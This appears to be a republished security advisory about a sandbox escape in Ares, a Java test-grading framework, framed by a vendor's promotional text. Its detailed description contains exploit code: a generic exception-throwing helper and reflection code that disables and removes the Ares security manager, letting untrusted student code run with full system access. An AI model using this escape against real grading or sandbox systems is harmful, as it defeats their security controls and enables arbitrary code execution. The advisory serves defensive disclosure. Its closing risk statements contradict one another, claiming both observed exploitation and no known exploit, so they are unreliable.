Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
GHSA-883x-6fch-6wjx
No affected components available
Impact
This allows an attacker to create special subclasses of InvocationTargetException that escape the exception sanitization because JUnit extracts the cause in a trusted context before the exception reaches Ares. This means that arbitrary student code can be executed in a trusted context, and that in turn allows disabling Ares and having full control over the system.
Patches
Update to version 1.7.6 or later.
Workarounds
Forbid student classes in trusted packages like, e.g., described in https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371
References
Are there any links users can visit to find out more? Not that I know of.
For more information
If you have any questions or comments about this advisory:
- Open an issue in https://github.com/ls1intum/Ares/issues
- Email us, see https://github.com/ls1intum/Ares/security/policy
Detailed description
Using generics, it is possible to throw checked exceptions without a throws clause:
public class ThrowWithoutThrowsHelper<X extends Throwable>
{
private final X throwable;
private ThrowWithoutThrowsHelper(X throwable)
{
this.throwable = throwable;
}
private <R> R throwWithThrows() throws X
{
throw throwable;
}
public static <R> R throwWithoutThrows(Throwable throwable)
{
ThrowWithoutThrowsHelper<?> helper = new ThrowWithoutThrowsHelper<Throwable>(throwable);
@SuppressWarnings("unchecked")
ThrowWithoutThrowsHelper<RuntimeException> helperCasted = (ThrowWithoutThrowsHelper<RuntimeException>) helper;
return helperCasted.throwWithThrows();
}
}
</details>
Using this, it is possible for a malicious testee to throw an instance of a malicious subclass of InvocationTargetException (let's call it EvilInvocationTargetException).
This exception is catched by org.junit.platform.commons.util.ReflectionUtils::invokeMethod, which looks like this:
public static Object invokeMethod(Method method, Object target, Object... args) {
Preconditions.notNull(method, "Method must not be null");
Preconditions.condition((target != null || isStatic(method)),
() -> String.format("Cannot invoke non-static method [%s] on a null target.", method.toGenericString()));
try {
return makeAccessible(method).invoke(target, args);
}
catch (Throwable t) {
throw ExceptionUtils.throwAsUncheckedException(getUnderlyingCause(t));
}
}
</details>
This method calls getUnderlyingCause (of the same class), passing to it the catched, malicious exception as an argument.
private static Throwable getUnderlyingCause(Throwable t) {
if (t instanceof InvocationTargetException) {
return getUnderlyingCause(((InvocationTargetException) t).getTargetException());
}
return t;
}
</details>
getUnderlyingCause in turn checks if the passed exception is instanceof InvocationTargetException, and if so, calls getTargetException on it. getTargetException can be overridden by subclasses of InvocationTargetException, like the EvilInvocationTargetException.
If EvilInvocationTargetException is in a whitelisted package (for example de.tum.in.test.api.security.notsealedsubpackage), getTargetException will be called with the entire stack containing only whitelisted frames.
This allows the attacker to uninstall the ArtemisSecurityManager in EvilInvocationTargetException::getTargetException:
SecurityManager secman = System.getSecurityManager();
Class<?> aresSecmanClass = secman.getClass();
Field isPartlyDisabledF = aresSecmanClass.getDeclaredField("isPartlyDisabled");
isPartlyDisabledF.setAccessible(true);
isPartlyDisabledF.set(secman, true);
System.setSecurityManager(null);
</details>
After uninstalling ArtemisSecurityManager, the attacker is free to do anything expressible in Java; including reading and writing any files, opening network connections, and executing arbitrary shell commands.
The vulnerability requires local access to the device to be exploited. It is easy for an attacker to exploit this vulnerability. An attacker needs basic access or low-level privileges. The attacker needs the user to perform some action, like clicking a link. The vulnerability can affect other systems as well, not just the initial system. There is a high impact on the confidentiality of the information. There is a high impact on the integrity of the data. There is a high impact on the availability of the system.
Exploitation activity has been observed. Apply available patches or mitigations urgently.
The exploit probability is very low. The vulnerability is unlikely to be exploited in the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard